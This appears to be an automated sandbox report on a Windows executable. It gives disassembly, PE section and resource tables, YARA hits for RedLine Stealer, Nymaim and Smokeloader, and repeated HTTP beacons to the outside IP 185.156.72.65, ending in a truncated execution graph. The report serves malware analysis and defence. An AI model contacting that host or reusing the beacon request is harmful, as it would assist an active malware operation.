                      add byte ptr [eax], al
                      pop es
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], dh
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], ch
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [esi], al
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or ecx, dword ptr [edx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      mov al, 00h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      push es
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      sub al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or ecx, dword ptr [edx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or dword ptr [eax], eax
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Rich Headers

                      Programming Language:
                      • [C++] VS2008 build 21022
                      • [ASM] VS2008 build 21022
                      • [ C ] VS2008 build 21022
                      • [IMP] VS2005 build 50727
                      • [RES] VS2008 build 21022
                      • [LNK] VS2008 build 21022

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6f05b0x6f.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x660000x8234.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x4a07fc0x18xdrminwo
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      0x10000x650000x3ae006fca4c1f6585720c30beb0be7704b720False0.9947045846602972data7.939522646317655IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0x660000x82340x3c0089d3d7c7aca97c0e42d17d7ea034689eFalse0.9261067708333334data7.710258045540537IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata 0x6f0000x10000x2006eb091ff88873fe4d3f846082d82dda4False0.154296875data1.0965193819233IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      0x700000x2900000x2002cfaf2e455d8b2f0d583b116a39174d7unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      xdrminwo0x3000000x1a40000x1a3e00d68365a49227c85b5dc56ba10ff89b9aFalse0.9920369017936886data7.9497278462939756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      fjbklart0x4a40000x10000x400cae2201d583ac639bf0027d5f316f0bcFalse0.72265625data5.853470289022653IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant0x4a50000x30000x2200ca36a0d19815f1a63cabe699a159f889False0.06789981617647059DOS executable (COM)0.7683343307042348IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_CURSOR0x664600xea8data1.0029317697228144
                      RT_CURSOR0x673080x8a8data1.0049638989169676
                      RT_CURSOR0x67bb00x568data1.0079479768786128
                      RT_CURSOR0x681180xea8data1.0029317697228144
                      RT_CURSOR0x68fc00x8a8data1.0049638989169676
                      RT_CURSOR0x698680x568SysEx File - IDP0.5228260869565218
                      RT_ICON0x4a085c0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.7557603686635944
                      RT_ICON0x4a085c0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.7557603686635944
                      RT_ICON0x4a0f240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilIndia0.6829875518672199
                      RT_ICON0x4a0f240x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilSri Lanka0.6829875518672199
                      RT_ICON0x4a34cc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilIndia0.8058510638297872
                      RT_ICON0x4a34cc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilSri Lanka0.8058510638297872
                      RT_STRING0x6cea80x252emptyTamilIndia0
                      RT_STRING0x6cea80x252emptyTamilSri Lanka0
                      RT_STRING0x6d0fc0x396emptyTamilIndia0
                      RT_STRING0x6d0fc0x396emptyTamilSri Lanka0
                      RT_STRING0x6d4940x520emptyTamilIndia0
                      RT_STRING0x6d4940x520emptyTamilSri Lanka0
                      RT_STRING0x6d9b40x3eeemptyTamilIndia0
                      RT_STRING0x6d9b40x3eeemptyTamilSri Lanka0
                      RT_ACCELERATOR0x6dda40x58emptyTamilIndia0
                      RT_ACCELERATOR0x6dda40x58emptyTamilSri Lanka0
                      RT_GROUP_CURSOR0x6ddfc0x30empty0
                      RT_GROUP_CURSOR0x6de2c0x30empty0
                      RT_GROUP_ICON0x4a39340x30dataTamilIndia0.9375
                      RT_GROUP_ICON0x4a39340x30dataTamilSri Lanka0.9375
                      RT_VERSION0x4a39640x254data0.5436241610738255
                      RT_MANIFEST0x4a3bb80x152ASCII text, with CRLF line terminators0.6479289940828402

                      Imports

                      DLLImport
                      kernel32.dlllstrcpy

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      TamilIndia
                      TamilSri Lanka

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Nov 30, 2024 13:10:06.338951111 CET4970480192.168.2.5185.156.72.65
                      Nov 30, 2024 13:10:06.459094048 CET8049704185.156.72.65192.168.2.5
                      Nov 30, 2024 13:10:06.459235907 CET4970480192.168.2.5185.156.72.65
                      Nov 30, 2024 13:10:06.459533930 CET4970480192.168.2.5185.156.72.65
                      Nov 30, 2024 13:10:06.579385042 CET8049704185.156.72.65192.168.2.5
                      Nov 30, 2024 13:10:28.420599937 CET8049704185.156.72.65192.168.2.5
                      Nov 30, 2024 13:10:28.420684099 CET4970480192.168.2.5185.156.72.65
                      Nov 30, 2024 13:10:28.420810938 CET4970480192.168.2.5185.156.72.65
                      Nov 30, 2024 13:10:28.540704012 CET8049704185.156.72.65192.168.2.5
                      Nov 30, 2024 13:10:31.423826933 CET4973780192.168.2.5185.156.72.65
                      Nov 30, 2024 13:10:31.543806076 CET8049737185.156.72.65192.168.2.5
                      Nov 30, 2024 13:10:31.543956995 CET4973780192.168.2.5185.156.72.65
                      Nov 30, 2024 13:10:31.544235945 CET4973780192.168.2.5185.156.72.65
                      Nov 30, 2024 13:10:31.664179087 CET8049737185.156.72.65192.168.2.5
                      Nov 30, 2024 13:10:53.499304056 CET8049737185.156.72.65192.168.2.5
                      Nov 30, 2024 13:10:53.500108004 CET4973780192.168.2.5185.156.72.65
                      Nov 30, 2024 13:10:53.500214100 CET4973780192.168.2.5185.156.72.65
                      Nov 30, 2024 13:10:53.620748043 CET8049737185.156.72.65192.168.2.5
                      Nov 30, 2024 13:10:56.708522081 CET4979280192.168.2.5185.156.72.65
                      Nov 30, 2024 13:10:56.829335928 CET8049792185.156.72.65192.168.2.5
                      Nov 30, 2024 13:10:56.829442978 CET4979280192.168.2.5185.156.72.65
                      Nov 30, 2024 13:10:56.829624891 CET4979280192.168.2.5185.156.72.65
                      Nov 30, 2024 13:10:56.949450016 CET8049792185.156.72.65192.168.2.5
                      Nov 30, 2024 13:11:04.845303059 CET4979280192.168.2.5185.156.72.65
                      Nov 30, 2024 13:11:07.864347935 CET4981980192.168.2.5185.156.72.65
                      Nov 30, 2024 13:11:07.984347105 CET8049819185.156.72.65192.168.2.5
                      Nov 30, 2024 13:11:07.984534025 CET4981980192.168.2.5185.156.72.65
                      Nov 30, 2024 13:11:07.984884977 CET4981980192.168.2.5185.156.72.65
                      Nov 30, 2024 13:11:08.104729891 CET8049819185.156.72.65192.168.2.5
                      Nov 30, 2024 13:11:29.922316074 CET8049819185.156.72.65192.168.2.5
                      Nov 30, 2024 13:11:29.922391891 CET4981980192.168.2.5185.156.72.65
                      Nov 30, 2024 13:11:29.922621012 CET4981980192.168.2.5185.156.72.65
                      Nov 30, 2024 13:11:30.042584896 CET8049819185.156.72.65192.168.2.5
                      Nov 30, 2024 13:11:32.942296028 CET4987480192.168.2.5185.156.72.65
                      Nov 30, 2024 13:11:33.062264919 CET8049874185.156.72.65192.168.2.5
                      Nov 30, 2024 13:11:33.062388897 CET4987480192.168.2.5185.156.72.65
                      Nov 30, 2024 13:11:33.062859058 CET4987480192.168.2.5185.156.72.65
                      Nov 30, 2024 13:11:33.182742119 CET8049874185.156.72.65192.168.2.5
                      Nov 30, 2024 13:11:54.991302013 CET8049874185.156.72.65192.168.2.5
                      Nov 30, 2024 13:11:54.991492987 CET4987480192.168.2.5185.156.72.65
                      Nov 30, 2024 13:11:54.991652012 CET4987480192.168.2.5185.156.72.65
                      Nov 30, 2024 13:11:55.111745119 CET8049874185.156.72.65192.168.2.5
                      Nov 30, 2024 13:11:58.005794048 CET4993280192.168.2.5185.156.72.65
                      Nov 30, 2024 13:11:58.125736952 CET8049932185.156.72.65192.168.2.5
                      Nov 30, 2024 13:11:58.125839949 CET4993280192.168.2.5185.156.72.65
                      Nov 30, 2024 13:11:58.126240015 CET4993280192.168.2.5185.156.72.65
                      Nov 30, 2024 13:11:58.248665094 CET8049932185.156.72.65192.168.2.5
                      Nov 30, 2024 13:11:58.876481056 CET4993280192.168.2.5185.156.72.65
                      Nov 30, 2024 13:12:01.895323038 CET4994080192.168.2.5185.156.72.65
                      Nov 30, 2024 13:12:02.015465975 CET8049940185.156.72.65192.168.2.5
                      Nov 30, 2024 13:12:02.015568972 CET4994080192.168.2.5185.156.72.65
                      Nov 30, 2024 13:12:02.015964031 CET4994080192.168.2.5185.156.72.65
                      Nov 30, 2024 13:12:02.135844946 CET8049940185.156.72.65192.168.2.5
                      Nov 30, 2024 13:12:23.944793940 CET8049940185.156.72.65192.168.2.5
                      Nov 30, 2024 13:12:23.944992065 CET4994080192.168.2.5185.156.72.65
                      Nov 30, 2024 13:12:23.945219040 CET4994080192.168.2.5185.156.72.65
                      Nov 30, 2024 13:12:24.065073013 CET8049940185.156.72.65192.168.2.5
                      Nov 30, 2024 13:12:26.958729982 CET4998380192.168.2.5185.156.72.65
                      Nov 30, 2024 13:12:27.078782082 CET8049983185.156.72.65192.168.2.5
                      Nov 30, 2024 13:12:27.078860044 CET4998380192.168.2.5185.156.72.65
                      Nov 30, 2024 13:12:27.079211950 CET4998380192.168.2.5185.156.72.65
                      Nov 30, 2024 13:12:27.199192047 CET8049983185.156.72.65192.168.2.5
                      Nov 30, 2024 13:12:35.418582916 CET4998380192.168.2.5185.156.72.65
                      Nov 30, 2024 13:12:38.428158998 CET4998480192.168.2.5185.156.72.65
                      Nov 30, 2024 13:12:38.549258947 CET8049984185.156.72.65192.168.2.5
                      Nov 30, 2024 13:12:38.552262068 CET4998480192.168.2.5185.156.72.65
                      Nov 30, 2024 13:12:38.552824974 CET4998480192.168.2.5185.156.72.65
                      Nov 30, 2024 13:12:38.672771931 CET8049984185.156.72.65192.168.2.5
                      Nov 30, 2024 13:13:00.548785925 CET8049984185.156.72.65192.168.2.5
                      Nov 30, 2024 13:13:00.549307108 CET4998480192.168.2.5185.156.72.65
                      Nov 30, 2024 13:13:00.549307108 CET4998480192.168.2.5185.156.72.65
                      Nov 30, 2024 13:13:00.669470072 CET8049984185.156.72.65192.168.2.5
                      Nov 30, 2024 13:13:03.570276022 CET4998580192.168.2.5185.156.72.65
                      Nov 30, 2024 13:13:03.690567970 CET8049985185.156.72.65192.168.2.5
                      Nov 30, 2024 13:13:03.690651894 CET4998580192.168.2.5185.156.72.65
                      Nov 30, 2024 13:13:03.690958977 CET4998580192.168.2.5185.156.72.65
                      Nov 30, 2024 13:13:03.810861111 CET8049985185.156.72.65192.168.2.5
                      Nov 30, 2024 13:13:25.618124008 CET8049985185.156.72.65192.168.2.5
                      Nov 30, 2024 13:13:25.618233919 CET4998580192.168.2.5185.156.72.65
                      Nov 30, 2024 13:13:25.618396997 CET4998580192.168.2.5185.156.72.65
                      Nov 30, 2024 13:13:25.738241911 CET8049985185.156.72.65192.168.2.5
                      Nov 30, 2024 13:13:28.629265070 CET4998680192.168.2.5185.156.72.65
                      Nov 30, 2024 13:13:28.751872063 CET8049986185.156.72.65192.168.2.5
                      Nov 30, 2024 13:13:28.751966000 CET4998680192.168.2.5185.156.72.65
                      Nov 30, 2024 13:13:28.752226114 CET4998680192.168.2.5185.156.72.65
                      Nov 30, 2024 13:13:28.872246027 CET8049986185.156.72.65192.168.2.5
                      Nov 30, 2024 13:13:32.284235001 CET4998680192.168.2.5185.156.72.65
                      Nov 30, 2024 13:13:35.301835060 CET4998780192.168.2.5185.156.72.65
                      Nov 30, 2024 13:13:35.422029972 CET8049987185.156.72.65192.168.2.5
                      Nov 30, 2024 13:13:35.422116041 CET4998780192.168.2.5185.156.72.65
                      Nov 30, 2024 13:13:35.423093081 CET4998780192.168.2.5185.156.72.65
                      Nov 30, 2024 13:13:35.543107986 CET8049987185.156.72.65192.168.2.5
                      Nov 30, 2024 13:13:57.424809933 CET8049987185.156.72.65192.168.2.5
                      Nov 30, 2024 13:13:57.424871922 CET4998780192.168.2.5185.156.72.65
                      Nov 30, 2024 13:13:57.425225019 CET4998780192.168.2.5185.156.72.65
                      Nov 30, 2024 13:13:57.546022892 CET8049987185.156.72.65192.168.2.5
                      Nov 30, 2024 13:14:00.444245100 CET4998880192.168.2.5185.156.72.65
                      Nov 30, 2024 13:14:00.564426899 CET8049988185.156.72.65192.168.2.5
                      Nov 30, 2024 13:14:00.564600945 CET4998880192.168.2.5185.156.72.65
                      Nov 30, 2024 13:14:00.568243027 CET4998880192.168.2.5185.156.72.65
                      Nov 30, 2024 13:14:00.688265085 CET8049988185.156.72.65192.168.2.5

                      HTTP Request Dependency Graph

                      • 185.156.72.65

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.549704185.156.72.65805544C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 13:10:06.459533930 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.549737185.156.72.65805544C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 13:10:31.544235945 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.549792185.156.72.65805544C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 13:10:56.829624891 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.549819185.156.72.65805544C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 13:11:07.984884977 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.549874185.156.72.65805544C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 13:11:33.062859058 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.549932185.156.72.65805544C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 13:11:58.126240015 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.549940185.156.72.65805544C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 13:12:02.015964031 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.549983185.156.72.65805544C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 13:12:27.079211950 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      8192.168.2.549984185.156.72.65805544C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 13:12:38.552824974 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      9192.168.2.549985185.156.72.65805544C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 13:13:03.690958977 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      10192.168.2.549986185.156.72.65805544C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 13:13:28.752226114 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      11192.168.2.549987185.156.72.65805544C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 13:13:35.423093081 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      12192.168.2.549988185.156.72.65805544C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 30, 2024 13:14:00.568243027 CET416OUTGET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      System Behavior

                      General

                      Target ID:0
                      Start time:07:10:00
                      Start date:30/11/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0x400000
                      File size:1'991'168 bytes
                      MD5 hash:BD23F2EE2AEA0A9C0464BC44292485FC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4515810671.0000000004780000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.2080963099.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:1.6%
                        Dynamic/Decrypted Code Coverage:5.3%
                        Signature Coverage:3.5%
                        Total number of Nodes:564
                        Total number of Limit Nodes:6
                        execution_graph 29045 5f79bf 29046 5f89c8 LoadLibraryA 29045->29046 29048 5fa16c 29046->29048 29049 4787cb9 29052 4787cc4 29049->29052 29053 4787cd3 29052->29053 29056 4788464 29053->29056 29061 478847f 29056->29061 29057 4788488 CreateToolhelp32Snapshot 29058 47884a4 Module32First 29057->29058 29057->29061 29059 47884b3 29058->29059 29062 4787cc3 29058->29062 29063 4788123 29059->29063 29061->29057 29061->29058 29064 478814e 29063->29064 29065 4788197 29064->29065 29066 478815f VirtualAlloc 29064->29066 29065->29065 29066->29065 29067 40a0b1 29068 40a0bd __FrameHandler3::FrameUnwindToState 29067->29068 29095 409e11 29068->29095 29070 40a0c4 29071 40a217 29070->29071 29079 40a0ee ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 29070->29079 29122 40a58a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __FrameHandler3::FrameUnwindToState 29071->29122 29073 40a21e 29123 4106ab 21 API calls __FrameHandler3::FrameUnwindToState 29073->29123 29075 40a224 29124 41066f 21 API calls __FrameHandler3::FrameUnwindToState 29075->29124 29077 40a22c 29078 40a10d 29079->29078 29085 40a18e 29079->29085 29121 410685 39 API calls 2 library calls 29079->29121 29103 40a6a5 29085->29103 29096 409e1a 29095->29096 29125 40a2ec IsProcessorFeaturePresent 29096->29125 29098 409e26 29126 40b77d 10 API calls 2 library calls 29098->29126 29100 409e2b 29101 409e2f 29100->29101 29127 40b79c 7 API calls 2 library calls 29100->29127 29101->29070 29128 40b570 29103->29128 29106 40a194 29107 412288 29106->29107 29130 41816d 29107->29130 29109 40a19c 29112 4087e0 29109->29112 29111 412291 29111->29109 29136 41841d 39 API calls 29111->29136 29139 402460 29112->29139 29115 402460 43 API calls 29116 408807 29115->29116 29143 405a50 29116->29143 29121->29085 29122->29073 29123->29075 29124->29077 29125->29098 29126->29100 29127->29101 29129 40a6b8 GetStartupInfoW 29128->29129 29129->29106 29131 418176 29130->29131 29135 4181a8 29130->29135 29137 41299d 39 API calls 3 library calls 29131->29137 29133 418199 29138 417f78 49 API calls 3 library calls 29133->29138 29135->29111 29136->29111 29137->29133 29138->29135 29140 402483 29139->29140 29140->29140 29458 402760 29140->29458 29142 402495 29142->29115 29485 410822 GetSystemTimeAsFileTime 29143->29485 29145 405a9f 29487 4106e2 29145->29487 29148 402760 